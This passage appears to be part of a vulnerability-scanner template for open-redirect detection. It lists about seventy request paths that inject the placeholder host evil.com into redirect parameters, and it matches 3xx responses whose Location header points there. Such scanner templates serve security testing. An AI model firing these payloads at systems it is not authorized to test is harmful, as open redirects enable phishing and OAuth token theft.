15 | - "{{BaseURL}}/?next=https://evil.com/"
16 | - "{{BaseURL}}/?ref_url=https://evil.com/"
17 | - "{{BaseURL}}/?state=https://evil.com/"
18 | - "{{BaseURL}}/?1=https://evil.com/"
19 | - "{{BaseURL}}/?redirect_uri=https://evil.com/"
20 | - "{{BaseURL}}/?forum_reg=https://evil.com/"
21 | - "{{BaseURL}}/?return_to=https://evil.com/"
22 | - "{{BaseURL}}/?redirect_url=https://evil.com/"
23 | - "{{BaseURL}}/?return_url=https://evil.com/"
24 | - "{{BaseURL}}/?host=https://evil.com/"
25 | - "{{BaseURL}}/?url=https://evil.com/"
26 | - "{{BaseURL}}/?redirectto=https://evil.com/"
27 | - "{{BaseURL}}/?return=https://evil.com/"
28 | - "{{BaseURL}}/?prejoin_data=https://evil.com/"
29 | - "{{BaseURL}}/?callback_url=https://evil.com/"
30 | - "{{BaseURL}}/?path=https://evil.com/"
31 | - "{{BaseURL}}/?authorize_callback=https://evil.com/"
32 | - "{{BaseURL}}/?email=https://evil.com/"
33 | - "{{BaseURL}}/?origin=https://evil.com/"
34 | - "{{BaseURL}}/?continue=https://evil.com/"
35 | - "{{BaseURL}}/?domain_name=https://evil.com/"
36 | - "{{BaseURL}}/?redir=https://evil.com/"
37 | - "{{BaseURL}}/?wp_http_referer=https://evil.com/"
38 | - "{{BaseURL}}/?endpoint=https://evil.com/"
39 | - "{{BaseURL}}/?shop=https://evil.com/"
40 | - "{{BaseURL}}/?qpt_question_url=https://evil.com/"
41 | - "{{BaseURL}}/?checkout_url=https://evil.com/"
42 | - "{{BaseURL}}/?ref_url=https://evil.com/"
43 | - "{{BaseURL}}/?redirect_to=https://evil.com/"
44 | - "{{BaseURL}}/?succUrl=https://evil.com/"
45 | - "{{BaseURL}}/?file=https://evil.com/"
46 | - "{{BaseURL}}/?link=https://evil.com/"
47 | - "{{BaseURL}}/?referrer=https://evil.com/"
48 | - "{{BaseURL}}/?recipient=https://evil.com/"
49 | - "{{BaseURL}}/?redirect=https://evil.com/"
50 | - "{{BaseURL}}/?u=https://evil.com/"
51 | - "{{BaseURL}}/?hostname=https://evil.com/"
52 | - "{{BaseURL}}/?returnTo=https://evil.com/"
53 | - "{{BaseURL}}/?return_path=https://evil.com/"
54 | - "{{BaseURL}}/?image=https://evil.com/"
55 | - "{{BaseURL}}/?requestTokenAndRedirect=https://evil.com/"
56 | - "{{BaseURL}}/?retURL=https://evil.com/"
57 | - "{{BaseURL}}/?next_url=https://evil.com/"
58 | - "{{BaseURL}}/redirect.php?url=https://evil.com/"
59 | - "{{BaseURL}}/r/?url=https://evil.com/"
60 | - "{{BaseURL}}/login?next=https://evil.com/"
61 | - "{{BaseURL}}/checkcookie?redir=https://evil.com/"
62 | - "{{BaseURL}}/#/path///https://evil.com/"
63 | - "{{BaseURL}}/login?to=https://evil.com/"
64 | - "{{BaseURL}}/?view=https://evil.com/"
65 | - "{{BaseURL}}/out?https://evil.com/"
66 | - "{{BaseURL}}/cgi-bin/redirect.cgi?https://evil.com/"
67 | - "{{BaseURL}}/redirect/https://evil.com/"
68 | - "{{BaseURL}}/redirect?url=https://evil.com/"
69 | - "{{BaseURL}}/link?url=https://evil.com/"
70 | - "{{BaseURL}}/?target=https://evil.com/"
71 | - "{{BaseURL}}/?rurl=https://evil.com/"
72 | - "{{BaseURL}}/?dest=https://evil.com/"
73 | - "{{BaseURL}}/?destination=https://evil.com/"
74 | - "{{BaseURL}}/?image_url=https://evil.com/"
75 | - "{{BaseURL}}/?go=https://evil.com/"
76 | - "{{BaseURL}}/?returnTo=https://evil.com/"
77 | - "{{BaseURL}}/success=https://evil.com/"
78 | - "{{BaseURL}}/data=https://evil.com/"
79 | - "{{BaseURL}}/qurl=https://evil.com/"
80 | - "{{BaseURL}}/login=https://evil.com/"
81 | - "{{BaseURL}}/logout=https://evil.com/"
82 | - "{{BaseURL}}/ext=https://evil.com/"
83 | - "{{BaseURL}}/clickurl=https://evil.com/"
84 | - "{{BaseURL}}/goto=https://evil.com/"
85 |
86 |
87 |
88 | redirects: false
89 | matchers-condition: and
90 | matchers:
91 | - type: word
92 | part: header
93 | words:
94 | - "Location: https://evil.com"
95 | - type: status
96 | status:
97 | - 301
98 | - 302
99 | - 303
100 | - 304
101 | - 307
102 | - 308
103 |
104 |
--------------------------------------------------------------------------------